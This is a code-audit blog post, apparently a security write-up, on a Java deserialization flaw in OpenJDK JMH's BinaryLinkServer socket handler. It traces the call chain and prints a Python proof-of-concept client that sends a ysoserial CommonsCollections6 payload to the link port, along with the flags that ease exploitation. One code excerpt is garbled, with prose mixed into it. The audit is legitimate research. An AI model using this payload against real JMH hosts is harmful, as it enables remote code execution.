

<!DOCTYPE html>
<html lang="" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" href="/img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="openjdk jmh的一个反序列化">
<meta property="og:type" content="article">
<meta property="og:title" content="A deserialization">
<meta property="og:url" content="http://novysodope.github.io/2024/01/24/111/index.html">
<meta property="og:site_name" content="novy&#39;s Blog">
<meta property="og:description" content="openjdk jmh的一个反序列化">
<meta property="og:locale">
<meta property="og:image" content="http://novysodope.github.io/images/111/1.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/2.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/3.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/4.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/5.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/6.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/7.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/8.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/9.png">
<meta property="og:image" content="http://novysodope.github.io/images/111/10.png">
<meta property="article:published_time" content="2024-01-23T16:13:21.000Z">
<meta property="article:modified_time" content="2024-12-11T03:36:47.448Z">
<meta property="article:author" content="novy">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://novysodope.github.io/images/111/1.png">
  
  <title>A deserialization - novy&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  



<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"novysodope.github.io","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6,h7,h8,h9","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"a6c1581442f57290135c4581f8de49ff","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"ZyJbAKYmfgJXZGNkDKKBRC0i-gzGzoHsz","app_key":"WXTmIgfHD2JkbhooWMtgYW3C","server_url":"https://zyjbakym.lc-cn-n1-shared.com","path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.2"><link rel="alternate" href="/rss2.xml" title="novy's Blog" type="application/rss+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>novy&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友情链接
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/rss2.xml">
                <i class="iconfont icon-rss-fill"></i>
                RSS
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/POC.html">
                
                test
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="A deserialization">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      novy
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2024-01-24 00:13" pubdate>
        January 24, 2024 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      9.9k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      31 分钟
    </span>
  

  
  
    

      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">A deserialization</h1>
            
            <div class="markdown-body">
              <h1 id="Firstly"><a href="#Firstly" class="headerlink" title="Firstly"></a>Firstly</h1><p><strong>I would like to declare that this article can only serve as a learning approach for deserialization auditing and corresponding script writing, as it is actually difficult to exploit this vulnerability</strong></p>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><p>In the code (src/main/java/org/openjdk/jmh/runner/link/BinaryLinkServer.java L270), I found that ‘ois’ belongs to the handler method, which is a constructor, in here, <code>is</code> is initialized to <code>socket.getInputStream()</code>: </p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-title">Handler</span><span class="hljs-params">(Socket socket)</span> <span class="hljs-keyword">throws</span> IOException </span>&#123;<br>    <span class="hljs-keyword">this</span>.socket = socket;<br>    <span class="hljs-keyword">this</span>.is = socket.getInputStream(); <span class="hljs-comment">//here</span><br>    <span class="hljs-keyword">this</span>.os = socket.getOutputStream();<br><br>    <span class="hljs-comment">// eager OOS initialization, let the other party read the stream header</span><br>    oos = <span class="hljs-keyword">new</span> ObjectOutputStream(<span class="hljs-keyword">new</span> BufferedOutputStream(os, BUFFER_SIZE));<br>    oos.flush();<br>&#125;<br></code></pre></div></td></tr></table></figure>
<p>then the ‘socket’ data stream is encapsulated into ‘ois’:<br>L279</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title">run</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-keyword">try</span> &#123;<br>        ois = <span class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> BufferedInputStream(is, BUFFER_SIZE));<br></code></pre></div></td></tr></table></figure>
<p>subsequently, the data stream was deserialized using ‘readObject’:<br>L287</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">Object obj;<br><span class="hljs-keyword">while</span> ((obj = ois.readObject()) != <span class="hljs-keyword">null</span>) &#123;<br></code></pre></div></td></tr></table></figure>
<p>It seems that this is a classic deserialization vulnerability,next, we need to find the entrance to make use of it.</p>
<p>Follow up and see that ‘Handler’ is called in ‘Acceptor’<br>L216</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-title">Acceptor</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> IOException </span>&#123;<br>    listenAddress = getListenAddress();<br>    server = <span class="hljs-keyword">new</span> ServerSocket(getListenPort(), <span class="hljs-number">50</span>, listenAddress);<br>&#125;<br><br><span class="hljs-meta">@Override</span><br><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title">run</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-keyword">try</span> &#123;<br>        <span class="hljs-keyword">while</span> (!Thread.interrupted()) &#123;<br>            Socket clientSocket = server.accept();<br>            Handler r = <span class="hljs-keyword">new</span> Handler(clientSocket); <span class="hljs-comment">//here</span><br>            <span class="hljs-keyword">if</span> (!handler.compareAndSet(<span class="hljs-keyword">null</span>, r)) &#123;<br>                <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> IllegalStateException(<span class="hljs-string">&quot;The handler is already registered&quot;</span>);<br>            &#125;<br></code></pre></div></td></tr></table></figure>
<p><code>Acceptor</code> is also a constructor, so check where it was called:<br>L206</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">&#125;<br><br>acceptor = <span class="hljs-keyword">new</span> Acceptor(); <span class="hljs-comment">//here</span><br>acceptor.start();<br><br>handler = <span class="hljs-keyword">new</span> AtomicReference&lt;&gt;();<br></code></pre></div></td></tr></table></figure>
<p>It belongs to the “BinaryLinkServer” constructor,<code>runSeparate</code> called the ‘BinaryLinkServer’ method:<br>src/main/java/org/openjdk/jmh/runner/Runner.java<br>L584</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> Multimap&lt;BenchmarkParams, BenchmarkResult&gt; <span class="hljs-title">runSeparate</span><span class="hljs-params">(ActionPlan actionPlan)</span> </span>&#123;<br>    Multimap&lt;BenchmarkParams, BenchmarkResult&gt; results = <span class="hljs-keyword">new</span> HashMultimap&lt;&gt;();<br><br>    <span class="hljs-keyword">if</span> (actionPlan.getMeasurementActions().size() != <span class="hljs-number">1</span>) &#123;<br>        <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> IllegalStateException(<span class="hljs-string">&quot;Expect only single benchmark in the action plan, but was &quot;</span> + actionPlan.getMeasurementActions().size());<br>    &#125;<br><br>    BinaryLinkServer server = <span class="hljs-keyword">null</span>;<br>    <span class="hljs-keyword">try</span> &#123;<br>        server = <span class="hljs-keyword">new</span> BinaryLinkServer(options, out); <span class="hljs-comment">//here</span><br><br>        server.setPlan(actionPlan);<br><br>        BenchmarkParams params = actionPlan.getMeasurementActions().get(<span class="hljs-number">0</span>).getParams();<br></code></pre></div></td></tr></table></figure>
<p>`runSeparate’ appears in the ‘runBenchmarks’ method:<br>L539</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> Collection&lt;RunResult&gt; <span class="hljs-title">runBenchmarks</span><span class="hljs-params">(SortedSet&lt;BenchmarkListEntry&gt; benchmarks)</span> <span class="hljs-keyword">throws</span> RunnerException </span>&#123;<br>    out.startRun();<br><br>    Multimap&lt;BenchmarkParams, BenchmarkResult&gt; results = <span class="hljs-keyword">new</span> TreeMultimap&lt;&gt;();<br>    List&lt;ActionPlan&gt; plan = getActionPlans(benchmarks); <span class="hljs-comment">//Pay attention to this method, it will set &#x27;Type&#x27; to &#x27;FORKED&#x27;`</span><br><br>    etaBeforeBenchmarks(plan);<br><br>    <span class="hljs-keyword">try</span> &#123;<br>        <span class="hljs-keyword">for</span> (ActionPlan r : plan) &#123;<br>            Multimap&lt;BenchmarkParams, BenchmarkResult&gt; res;<br>            <span class="hljs-keyword">switch</span> (r.getType()) &#123;<br>                <span class="hljs-keyword">case</span> EMBEDDED:<br>                    res = runBenchmarksEmbedded(r);<br>                    <span class="hljs-keyword">break</span>;<br>                <span class="hljs-keyword">case</span> FORKED:<br>                    res = runSeparate(r); <span class="hljs-comment">//here</span><br>                    <span class="hljs-keyword">break</span>;<br></code></pre></div></td></tr></table></figure>
<p>There is a condition here that the ‘runSeparate’ method will only be call when the ‘Type’ is ‘FORKED’, but this is not a concern because in the ‘getActionPlans’ method above, ‘FORKED’ has been initialized as <code>Type</code><br>L54</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> List&lt;ActionPlan&gt; <span class="hljs-title">getActionPlans</span><span class="hljs-params">(Set&lt;BenchmarkListEntry&gt; benchmarks)</span> </span>&#123;<br>    ActionPlan base = <span class="hljs-keyword">new</span> ActionPlan(ActionType.FORKED);<br>Returning to the main topic, <span class="hljs-string">&#x27;runBenchmarks&#x27;</span> will be called by the <span class="hljs-string">&#x27;internalRun&#x27;</span> method<br>L309<br>   benchmarks.clear();<br>    benchmarks.addAll(newBenchmarks);<br>&#125;<br><br>Collection&lt;RunResult&gt; results = runBenchmarks(benchmarks); <span class="hljs-comment">//here</span><br><br><span class="hljs-comment">// If user requested the result file, write it out.</span><br><span class="hljs-keyword">if</span> (resultFile != <span class="hljs-keyword">null</span>) &#123;<br>    ResultFormatFactory.getInstance(<br></code></pre></div></td></tr></table></figure>
<p>And ‘internalRun’ is called by the ‘run’ method, ‘run’ is a method of the ‘Runner’ class,<br>L182</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> Collection&lt;RunResult&gt; <span class="hljs-title">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> RunnerException </span>&#123;<br><span class="hljs-keyword">if</span> (JMH_LOCK_IGNORE) &#123;<br>    out.println(<span class="hljs-string">&quot;# WARNING: JMH lock is ignored by user request, make sure no other JMH instances are running&quot;</span>);<br>    <span class="hljs-keyword">return</span> internalRun();<span class="hljs-comment">//here</span><br>&#125;<br><br><span class="hljs-keyword">final</span> String tailMsg = <span class="hljs-string">&quot; the JMH lock (&quot;</span> + JMH_LOCK_FILE + <span class="hljs-string">&quot;), exiting. Use -Djmh.ignoreLock=true to forcefully continue.&quot;</span>;<br><br>File lockFile;<br><span class="hljs-keyword">try</span> &#123;<br>    lockFile = <span class="hljs-keyword">new</span> File(JMH_LOCK_FILE);<br>    lockFile.createNewFile();<br><br>    <span class="hljs-comment">// Make sure the lock file is world-writeable, otherwise the lock file created by current</span><br>    <span class="hljs-comment">// user would not work for any other user, always failing the run.</span><br>    lockFile.setWritable(<span class="hljs-keyword">true</span>, <span class="hljs-keyword">false</span>);<br>&#125; <span class="hljs-keyword">catch</span> (IOException e) &#123;<br>    <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> RunnerException(<span class="hljs-string">&quot;ERROR: Unable to create&quot;</span> + tailMsg, e);<br>&#125;<br><br><span class="hljs-keyword">try</span> (RandomAccessFile raf = <span class="hljs-keyword">new</span> RandomAccessFile(lockFile, <span class="hljs-string">&quot;rw&quot;</span>);<br>     FileLock lock = raf.getChannel().tryLock()) &#123;<br>    <span class="hljs-keyword">if</span> (lock == <span class="hljs-keyword">null</span>) &#123;<br>        <span class="hljs-comment">// Lock acquisition failed, pretend this was the overlap.</span><br>        <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> OverlappingFileLockException();<br>    &#125;<br>    <span class="hljs-keyword">return</span> internalRun();<span class="hljs-comment">//here</span><br></code></pre></div></td></tr></table></figure>
<p>which is the entry point to ‘jmh’, we can see from the Sample that:<br><code>src/main/java/org/openjdk/jmh/samples/*</code><br>for example JMHSample_01_HelloWorld.java</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"> <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> RunnerException </span>&#123;<br>        Options opt = <span class="hljs-keyword">new</span> OptionsBuilder()<br>                .include(JMHSample_01_HelloWorld.class.getSimpleName())<br>                .forks(<span class="hljs-number">1</span>)<br>                .build();<br><br>        <span class="hljs-keyword">new</span> Runner(opt).run(); <span class="hljs-comment">//here</span><br>    &#125;<br><br>&#125;<br></code></pre></div></td></tr></table></figure>
<p>So now the entrance has been found, but there is one question, the trigger point for this vulnerability is a socket’s function, so we need to know his port before we can communicate:<br>in <code>BinaryLinkServer</code> class<br>L194</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">int</span> <span class="hljs-title">getListenPort</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-keyword">return</span> Integer.getInteger(<span class="hljs-string">&quot;jmh.link.port&quot;</span>, <span class="hljs-number">0</span>);<br>&#125;<br></code></pre></div></td></tr></table></figure>
<p>It listens to all ports, which means the ports are random, but <code>jmh.link.port</code> can be specified by command or written in code: <code>-Djmh.link.port=9090</code><br>Now, assuming we already know the port, can write a client that sends malicious data to it, after continuous improvement, a usable POC was ultimately obtained:<br>use python3 and ysoserial</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">connect_to_server</span>():</span><br>    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br><br>    host = <span class="hljs-string">&quot;127.0.0.1&quot;</span><br>    port = <span class="hljs-number">9090</span><br><br>    max_attempts = <span class="hljs-number">20</span><br>    attempts = <span class="hljs-number">0</span><br><br>    <span class="hljs-keyword">while</span> attempts &lt; max_attempts:<br>        <span class="hljs-keyword">try</span>:<br>            client_socket.connect((host, port))<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;connect to <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>&quot;</span>)<br>            <span class="hljs-keyword">return</span> client_socket<br><br>        <span class="hljs-keyword">except</span> socket.error <span class="hljs-keyword">as</span> e:<br>            attempts += <span class="hljs-number">1</span><br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;error,reconnect (<span class="hljs-subst">&#123;attempts&#125;</span>/<span class="hljs-subst">&#123;max_attempts&#125;</span>): <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>            time.sleep(<span class="hljs-number">1</span>)<br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;error <span class="hljs-subst">&#123;host&#125;</span>:<span class="hljs-subst">&#123;port&#125;</span>,reached maximum number of attempts&quot;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br><br>client_socket = connect_to_server()<br><br><span class="hljs-keyword">if</span> client_socket:<br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-comment">#Generate a payload for &#x27;commons-collections&#x27; using &#x27;ysoserial&#x27;,command:java -jar ysoserial.jar CommonsCollections6 &quot;calc&quot; &gt; cc6calc.ser</span><br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;cc6calc.ser&quot;</span>, <span class="hljs-string">&quot;rb&quot;</span>) <span class="hljs-keyword">as</span> file:<br>            <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>                data_to_send = file.read(<span class="hljs-number">1024</span>)<br>                <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> data_to_send:<br>                    <span class="hljs-keyword">break</span><br>                client_socket.send(data_to_send)<br>        response_data = client_socket.recv(<span class="hljs-number">1024</span>)<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;Response received from the server: <span class="hljs-subst">&#123;response_data.decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>, <span class="hljs-string">&#x27;replace&#x27;</span>)&#125;</span>&quot;</span>)<br><br>    <span class="hljs-keyword">finally</span>:<br>        client_socket.close()<br></code></pre></div></td></tr></table></figure>
<p>Pasting dependencies in pom to simulate a real web environment：</p>
<figure class="highlight"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">&lt;dependency&gt;<br>    &lt;groupId&gt;commons-collections&lt;/groupId&gt;<br>    &lt;artifactId&gt;commons-collections&lt;/artifactId&gt;<br>    &lt;version&gt;3.1&lt;/version&gt;<br>&lt;/dependency&gt;<br></code></pre></div></td></tr></table></figure>
<p>Finally, be sure to run POC first before running the jmh project:<br><img src="/images/111/1.png" srcset="/img/loading.gif" lazyload><br>Run the src/main/java/org/openjdk/jmh/samples/JMHSample_01_HelloWorld.java<br><img src="/images/111/2.png" srcset="/img/loading.gif" lazyload><br>In summary, this is a deserialization issue caused by socket communication, to exploit this issue, it is necessary to know the port number and the POC must first run before the project, this is due to code reasons:</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">if</span> (!handler.compareAndSet(<span class="hljs-keyword">null</span>, r)) &#123;<br>    <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> IllegalStateException(<span class="hljs-string">&quot;The handler is already registered&quot;</span>);<br>&#125;<br></code></pre></div></td></tr></table></figure>



<h2 id="After-a-while"><a href="#After-a-while" class="headerlink" title="After a while"></a>After a while</h2><p>I discovered a simpler attack scenario, when running “jmh” with the parameter “-Djmh.link.port=9090 -Djmh.ignoreLock=true” (and to use multiple “benchmarks”, this parameter must be added), it not only specifies the port, but also allows other “benchmarks” to be executed when the “jmh.lock” file exists, that is to say, by specifying these two parameters to the “jmh” project, I don’t have to restart the project to exploit the vulnerability, don’t worry about the POC execution order. As long as “benchmarks” are used, vulnerabilities will be triggered</p>
<p>Next, I will test “JMHSample_1_HelloWorld”, “JMHSample_2_BenchmarkModes”, “JMHSample_ 03_States”, “JMHSample_ 04_DefaultState”, and “JMHSample_ 05_StatesFixtures”<br><img src="/images/111/3.png" srcset="/img/loading.gif" lazyload></p>
<p>Run the project:<br><img src="/images/111/4.png" srcset="/img/loading.gif" lazyload><br>Run the POC:<br><img src="/images/111/5.png" srcset="/img/loading.gif" lazyload><br>After running POC, project the first benchmarks will report error:<br><img src="/images/111/6.png" srcset="/img/loading.gif" lazyload><br>But it’s not important, restart POC, run the other project, the subsequent benchmarks will trigger vulnerabilities:<br><img src="/images/111/7.png" srcset="/img/loading.gif" lazyload><br><img src="/images/111/8.png" srcset="/img/loading.gif" lazyload><br><img src="/images/111/9.png" srcset="/img/loading.gif" lazyload><br><img src="/images/111/10.png" srcset="/img/loading.gif" lazyload><br>For this, I have made some improvements to the POC, enable the script to continuously connect to the target port and send malicious data, no need to manually restart anything anymore, just wait for benchmarks to run:</p>
